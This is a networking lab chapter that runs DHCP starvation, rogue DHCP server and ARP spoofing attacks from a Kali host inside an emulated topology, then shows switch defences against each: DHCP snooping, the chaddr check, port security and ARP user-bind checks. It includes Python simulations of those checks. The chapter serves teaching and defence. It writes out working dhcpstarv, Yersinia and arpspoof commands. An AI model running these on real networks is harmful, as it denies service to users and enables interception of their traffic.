Chapter 1 Network Attack Simulation Basics

1.1 Starvation attack: exhausting the DHCP address pool

Figure 1-1: DHCP attack network topology

1. Configure R1 as the DHCP server

dhcp enable
interface GigabitEthernet0/0/0
 ip address 192.168.100.1 255.255.255.240
 dhcp select interface
#View the address pool summary
display ip pool
  Pool-name      : GigabitEthernet0/0/0/0
  Pool-No        : 0
  Position       : Interface       Status           : Unlocked
  Gateway-0      : 192.168.100.1   
  Mask           : 255.255.255.240
  VPN instance   : --

  IP address Statistic
    Total       :13    
    Used        :0          Idle        :13    
    Expired     :0          Conflict    :0          Disable   :0  
#View the address pool details
display ip pool interface GigabitEthernet0/0/0/0 
  Pool-name      : GigabitEthernet0/0/0/0
  Pool-No        : 0
  Lease          : 1 Days 0 Hours 0 Minutes
  Domain-name    : -
  DNS-server0    : -               
  NBNS-server0   : -               
  Netbios-type   : -               
  Position       : Interface       Status           : Unlocked
  Gateway-0      : 192.168.100.1   
  Mask           : 255.255.255.240
  VPN instance   : --

         Start           End     Total  Used  Idle(Expired)  Conflict  Disable
   192.168.100.1  192.168.100.14    13     0         13(0)         0        0
#View every entry in the address pool
display ip pool interface GigabitEthernet0/0/0/0 all
      1   192.168.100.2                 -          -   Idle       
      2   192.168.100.3                 -          -   Idle       
      3   192.168.100.4                 -          -   Idle       
      4   192.168.100.5                 -          -   Idle       
      5   192.168.100.6                 -          -   Idle       
      6   192.168.100.7                 -          -   Idle       
      7   192.168.100.8                 -          -   Idle       
      8   192.168.100.9                 -          -   Idle       
      9  192.168.100.10                 -          -   Idle       
     10  192.168.100.11                 -          -   Idle       
     11  192.168.100.12                 -          -   Idle       
     12  192.168.100.13                 -          -   Idle       
     13  192.168.100.14                 -          -   Idle      

2. Set the PC to obtain an IP address automatically

PC>ipconfig 
Link local IPv6 address...........: fe80::5689:98ff:fee4:1890
IPv6 address......................: :: / 128
IPv6 gateway......................: ::
IPv4 address......................: 192.168.100.14
Subnet mask.......................: 255.255.255.240
Gateway...........................: 192.168.100.1
Physical address..................: 54-89-98-E4-18-90
DNS server........................:

3. View every address pool entry on the router

display ip pool interface GigabitEthernet0/0/0/0 all
      1   192.168.100.2                 -          -   Idle       
      2   192.168.100.3                 -          -   Idle       
      3   192.168.100.4                 -          -   Idle       
      4   192.168.100.5                 -          -   Idle       
      5   192.168.100.6                 -          -   Idle       
      6   192.168.100.7                 -          -   Idle       
      7   192.168.100.8                 -          -   Idle       
      8   192.168.100.9                 -          -   Idle       
      9  192.168.100.10                 -          -   Idle       
     10  192.168.100.11                 -          -   Idle       
     11  192.168.100.12                 -          -   Idle       
     12  192.168.100.13                 -          -   Idle       
     13  192.168.100.14    5489-98e4-1890         36   Used       

4. Connect the Kali server to the cloud

[Figure 2: Kali server cloud connection settings]

5. SW1 configuration

#Disable spanning tree on SW1
stp disable
#Restart the DHCP service on DHCP-SERVER
interface GigabitEthernet0/0/0
undo dhcp select interface
dhcp select interface

6. Launch the attack from Kali

#View network information
┌──(root💀kali)-[~/Desktop]
└─# ip addr
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000                                                     
    link/ether 00:0c:29:e2:b3:f4 brd ff:ff:ff:ff:ff:ff
    inet 192.168.11.100/24 brd 192.168.11.255 scope global eth0
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000                                                     
    link/ether 00:0c:29:e2:b3:fe brd ff:ff:ff:ff:ff:ff
    inet 192.168.8.137/24 brd 192.168.8.255 scope global dynamic eth1
       valid_lft 1160sec preferred_lft 1160sec
  
#Launch the DHCP starvation attack
┌──(root💀kali)-[~/Desktop]
└─# dhcpstarv -i eth0
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.14 for 00:16:36:65:6f:03 from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.13 for 00:16:36:0c:1d:5d from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.12 for 00:16:36:06:7f:cb from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.11 for 00:16:36:25:b5:f5 from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.10 for 00:16:36:c9:e4:20 from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.9 for 00:16:36:37:b0:87 from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.8 for 00:16:36:b5:46:df from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.7 for 00:16:36:d1:d9:23 from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.6 for 00:16:36:2f:78:c4 from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.5 for 00:16:36:dc:d5:4a from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.4 for 00:16:36:35:dd:bd from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.3 for 00:16:36:cb:83:5c from 192.168.100.1
16:34:45 07/20/23: no network mask option in DHCPOFFER
16:34:45 07/20/23: got address 192.168.100.2 for 00:16:36:6e:8c:97 from 192.168.100.1

7. View the address information on the DHCP server

display ip pool interface GigabitEthernet0/0/0/0 all
      1   192.168.100.2    0016-366e-8c97        106   Used       
      2   192.168.100.3    0016-36cb-835c        106   Used       
      3   192.168.100.4    0016-3635-ddbd        106   Used       
      4   192.168.100.5    0016-36dc-d54a        107   Used       
      5   192.168.100.6    0016-362f-78c4        107   Used       
      6   192.168.100.7    0016-36d1-d923        107   Used       
      7   192.168.100.8    0016-36b5-46df        107   Used       
      8   192.168.100.9    0016-3637-b087        107   Used       
      9  192.168.100.10    0016-36c9-e420        107   Used       
     10  192.168.100.11    0016-3625-b5f5        107   Used       
     11  192.168.100.12    0016-3606-7fcb        107   Used       
     12  192.168.100.13    0016-360c-1d5d        107   Used       
     13  192.168.100.14    0016-3665-6f03        119   Used   

1.2 DHCP server spoofing attack

1. Spoofing attack
┌──(root💀kali)-[~/Desktop]
└─# yersinia -G  
[Figure 3]
[Figure 4]

2. Packet capture

[Figure 5: packet capture]

3. View the address on the PC

PC>ipconfig 

Link local IPv6 address...........: fe80::5689:98ff:fee4:1890
IPv6 address......................: :: / 128
IPv6 gateway......................: ::
IPv4 address......................: 192.168.11.200
Subnet mask.......................: 255.255.255.0
Gateway...........................: 192.168.11.100
Physical address..................: 54-89-98-E4-18-90
DNS server........................: 192.168.11.100

1.3 DHCP attack mitigation

1. Mitigating the DHCP server spoofing attack
1) Restore the DHCP service
interface GigabitEthernet0/0/0
[DHCP-SERVER-GigabitEthernet0/0/0]undo dhcp select interface
Warning: There are IP addresses allocated in the pool. Are you sure to delete the pool?[Y/N]:y
[DHCP-SERVER-GigabitEthernet0/0/0] dhcp select interface

display ip pool interface GigabitEthernet0/0/0/0 all

      1   192.168.100.2                 -          -   Idle       
      2   192.168.100.3                 -          -   Idle       
      3   192.168.100.4                 -          -   Idle       
      4   192.168.100.5                 -          -   Idle       
      5   192.168.100.6                 -          -   Idle       
      6   192.168.100.7                 -          -   Idle       
      7   192.168.100.8                 -          -   Idle       
      8   192.168.100.9                 -          -   Idle       
      9  192.168.100.10                 -          -   Idle       
     10  192.168.100.11                 -          -   Idle       
     11  192.168.100.12                 -          -   Idle       
     12  192.168.100.13                 -          -   Idle       
     13  192.168.100.14                 -          -   Idle       
2) Enable DHCP snooping and a trusted port on SW1
dhcp enable
dhcp snooping enable
vlan 1
dhcp snooping enable
#Add the trusted port (the one facing the legitimate DHCP server)
dhcp snooping trusted interface GigabitEthernet 0/0/2

3) View the address information on the PC
PC>ipconfig 

Link local IPv6 address...........: fe80::5689:98ff:fee4:1890
IPv6 address......................: :: / 128
IPv6 gateway......................: ::
IPv4 address......................: 192.168.100.14
Subnet mask.......................: 255.255.255.240
Gateway...........................: 192.168.100.1
Physical address..................: 54-89-98-E4-18-90


2. Mitigating the DHCP starvation attack
1) Enable DHCP snooping on SW1 together with dhcp snooping check chaddr so that such messages are discarded
port-group 1
group-member GigabitEthernet 0/0/1 to GigabitEthernet 0/0/24
#Enable the dhcp snooping chaddr check
dhcp snooping check dhcp-chaddr enable
#Enter G0/0/3 to verify
interface GigabitEthernet0/0/3
 dhcp snooping check dhcp-chaddr enable

2) Launch the dhcpstarv starvation attack
[Figure 6: dhcpstarv output]

3) View the DHCP information

[Figure 7: DHCP snooping status]
If the frame's source MAC address and the chaddr field differ, the message is treated as an attack; with DHCP snooping plus dhcp snooping check chaddr enabled, the message is discarded.

4) View the address information on the PC
PC>ipconfig 

Link local IPv6 address...........: fe80::5689:98ff:fee4:1890
IPv6 address......................: :: / 128
IPv6 gateway......................: ::
IPv4 address......................: 192.168.100.14
Subnet mask.......................: 255.255.255.240
Gateway...........................: 192.168.100.1
Physical address..................: 54-89-98-E4-18-90
DNS server........................:


3. Launch a Yersinia attack
1) Yersinia DHCP DoS attack
[Figure 8]
[Figure 9]
[Figure 10]
In the Yersinia DHCP DoS attack the source MAC address and the chaddr are identical, so this attack cannot be blocked by CHECK-CHADDR.

2) Mitigation through port security
Yersinia forges both the SOURCE-MAC and the CHADDR, so the attack makes the switch port learn a large number of MAC addresses. On a single access port of a switch only one MAC address is allowed to be learned; if more than one is learned, the port is penalised, and the penalty is to shut down the interface (shutdown).
port-group 1
#Enable port security
port-security enable
#Set the maximum number of MAC addresses
port-security max-mac-num 1
#Set the protect action (shutdown)
port-security protect-action shutdown
#After the shutdown action, the port must be re-enabled manually
interface GigabitEthernet 0/0/3
undo shutdown
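The two defences above, the chaddr check and port security, as one added Python example that is not part of the original lab or any vendor code. It builds minimal DHCPDISCOVER frames for the three traffic patterns in this chapter (the PC, dhcpstarv with the Kali host's real source MAC and random chaddr, Yersinia with consistently forged fields, whose MACs are constructed here) and applies both checks on each port; the frame layout, check order and verdict strings are this example's own assumptions.

```python
import struct

CHADDR_OFF = 14 + 20 + 8 + 28  # Ethernet + IPv4 (no options) + UDP, then 28 bytes into BOOTP (assumed layout)

def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))

def build_discover(src_mac, chaddr):
    """Minimal DHCPDISCOVER frame (checksums left zero); enough for the two checks below."""
    bootp = (b"\x01\x01\x06\x00" + b"\x00" * 24 + mac_bytes(chaddr) + b"\x00" * 10
             + b"\x00" * 192 + b"\x63\x82\x53\x63" + b"\x35\x01\x01\xff")
    udp = struct.pack("!HHHH", 68, 67, 8 + len(bootp), 0)
    ip = (b"\x45\x00" + struct.pack("!H", 20 + 8 + len(bootp)) + b"\x00" * 4
          + b"\x40\x11\x00\x00" + b"\x00" * 4 + b"\xff" * 4)
    eth = b"\xff" * 6 + mac_bytes(src_mac) + b"\x08\x00"
    return eth + ip + udp + bootp

def chaddr_matches(frame):
    """'dhcp snooping check dhcp-chaddr enable': Ethernet source MAC must equal BOOTP chaddr."""
    return frame[6:12] == frame[CHADDR_OFF:CHADDR_OFF + 6]

class AccessPort:
    """One access port with 'port-security enable', 'max-mac-num 1', 'protect-action shutdown'."""
    def __init__(self, max_mac_num=1):
        self.max_mac_num, self.learned, self.shutdown = max_mac_num, set(), False

    def ingress(self, frame):
        if self.shutdown:
            return "dropped: port is shut down"
        self.learned.add(frame[6:12])  # the switch learns every source MAC seen on the port
        if len(self.learned) > self.max_mac_num:
            self.shutdown = True       # stays down until an operator issues 'undo shutdown'
            return "shutdown: MAC limit exceeded"
        if not chaddr_matches(frame):
            return "dropped: chaddr mismatch"
        return "forwarded"

def simulate():
    """Replays the chapter's three traffic patterns, each against its own protected port."""
    pc, starv, yersinia = AccessPort(), AccessPort(), AccessPort()
    return {
        "pc": pc.ingress(build_discover("54-89-98-E4-18-90", "54-89-98-E4-18-90")),
        # dhcpstarv keeps the Kali host's real source MAC but randomises chaddr
        "dhcpstarv": [starv.ingress(build_discover("00:0c:29:e2:b3:f4", c))
                      for c in ("00:16:36:65:6f:03", "00:16:36:0c:1d:5d")],
        # Yersinia forges source MAC and chaddr consistently (constructed MACs): only the count gives it away
        "yersinia": [yersinia.ingress(build_discover(m, m))
                     for m in ("02:aa:00:00:00:01", "02:aa:00:00:00:02", "02:aa:00:00:00:03")],
    }
```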

1.4 ARP attack mitigation

[Figure 11: ARP attack topology]
1. ARP attack
1) R2 configuration
interface GigabitEthernet0/0/0
ip address 192.168.11.101 24
ip route-static 0.0.0.0 0.0.0.0 192.168.11.199
ping 192.168.11.199
     Reply from 192.168.11.199: bytes=56 Sequence=1 ttl=255 time=140 ms
  
display arp
192.168.11.101  5489-98e6-7f25            I -         GE0/0/0
192.168.11.199  5489-9879-755b  20        D-0         GE0/0/0

2) R3 configuration
interface GigabitEthernet0/0/0
ip address 192.168.11.199 24
dis arp
192.168.11.199  5489-9879-755b            I -         GE0/0/0
192.168.11.101  5489-98e6-7f25  20        D-0         GE0/0/0

3) Disable port security on SW1
interface GigabitEthernet 0/0/3
undo port-security enable

4) Launch the dsniff attack from Kali
┌──(root💀kali)-[~/Desktop]
└─# ip add     
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000                                                     
    link/ether 00:0c:29:e2:b3:f4 brd ff:ff:ff:ff:ff:ff
    inet 192.168.11.100/24 brd 192.168.11.255 scope global eth0
       valid_lft forever preferred_lft forever


┌──(root💀kali)-[~/Desktop]
└─# arpspoof                                            
Version: 2.4
Usage: arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
                                                                             
┌──(root💀kali)-[~/Desktop]
└─# arpspoof -i eth0 -t 192.168.11.101 -r 192.168.11.199               130 ⨯
0:c:29:e2:b3:f4 54:89:98:e6:7f:25 0806 42: arp reply 192.168.11.199 is-at 0:c:29:e2:b3:f4
0:c:29:e2:b3:f4 54:89:98:79:75:5b 0806 42: arp reply 192.168.11.101 is-at 0:c:29:e2:b3:f4

5) View the poisoned ARP table on R2
dis arp
192.168.11.101  5489-98e6-7f25            I -         GE0/0/0
192.168.11.199  000c-29e2-b3f4  20        D-0         GE0/0/0
192.168.11.100  000c-29e2-b3f4  15        D-0         GE0/0/0

6) View the poisoned ARP table on R3
192.168.11.199  5489-9879-755b            I -         GE0/0/0
192.168.11.101  000c-29e2-b3f4  20        D-0         GE0/0/0
192.168.11.100  000c-29e2-b3f4  15        D-0         GE0/0/0

2. ARP man-in-the-middle attack mitigation: defence technique DHCP-SNOOPING
1) Once DHCP-SNOOPING is enabled, the switch builds the DHCP-SNOOPING binding table with five elements (IP, MAC, VLAN, interface, lease)
display dhcp snooping user-bind all
192.168.100.14   5489-98e4-1890  1   /--  /--    GE0/0/1        2023.07.21-12:35

2) Enable the ARP ANTI-ATTACK command
#Enable in the VLAN view
vlan 1
arp anti-attack check user-bind enable 
#Enable in the interface view
interface GigabitEthernet 0/0/3
arp anti-attack check user-bind enable
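How the user-bind check decides, as an added Python example that is not from the lab or the switch vendor: the binding table is constructed from the single 'display dhcp snooping user-bind all' entry shown above, and an ARP packet arriving on a checked port is forwarded only when its sender IP, sender MAC, VLAN and ingress interface all match that entry (on the real switch the compared items are configurable; all four are assumed here). The two arpspoof replies from step 4) are assumed to arrive on GE0/0/3, and the 'claim_pc' reply is constructed.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Binding:
    ip: str
    mac: str
    vlan: int
    interface: str

def norm_mac(mac):
    """Normalise Huawei '5489-98e4-1890', Windows '54-89-98-E4-18-90' and arpspoof '0:c:29:e2:b3:f4'."""
    groups = mac.replace("-", ":").split(":")
    width = 4 if len(groups) == 3 else 2
    return "".join(g.zfill(width) for g in groups).lower()

# Constructed from the single 'display dhcp snooping user-bind all' entry shown above (lease omitted).
BINDING_TABLE = {
    "192.168.100.14": Binding("192.168.100.14", norm_mac("5489-98e4-1890"), 1, "GE0/0/1"),
}

def arp_user_bind_check(sender_ip, sender_mac, vlan, interface, table=BINDING_TABLE):
    """'arp anti-attack check user-bind': forward an ARP packet from a checked port only when its
    sender IP, sender MAC, VLAN and ingress interface all match one binding-table entry (assumed)."""
    b = table.get(sender_ip)
    if b is None:
        return "drop: no binding for sender IP"
    if b.mac != norm_mac(sender_mac):
        return "drop: sender MAC does not match binding"
    if b.vlan != vlan or b.interface != interface:
        return "drop: wrong VLAN or interface for binding"
    return "forward"

def replay():
    """The PC's own ARP reply, the two arpspoof replies from step 4) arriving on GE0/0/3,
    and one constructed reply that claims the PC's address from the attacker's port."""
    return {
        "pc": arp_user_bind_check("192.168.100.14", "54-89-98-E4-18-90", 1, "GE0/0/1"),
        "spoof_r3": arp_user_bind_check("192.168.11.199", "0:c:29:e2:b3:f4", 1, "GE0/0/3"),
        "spoof_r2": arp_user_bind_check("192.168.11.101", "0:c:29:e2:b3:f4", 1, "GE0/0/3"),
        "claim_pc": arp_user_bind_check("192.168.100.14", "00:0c:29:e2:b3:f4", 1, "GE0/0/3"),
    }
```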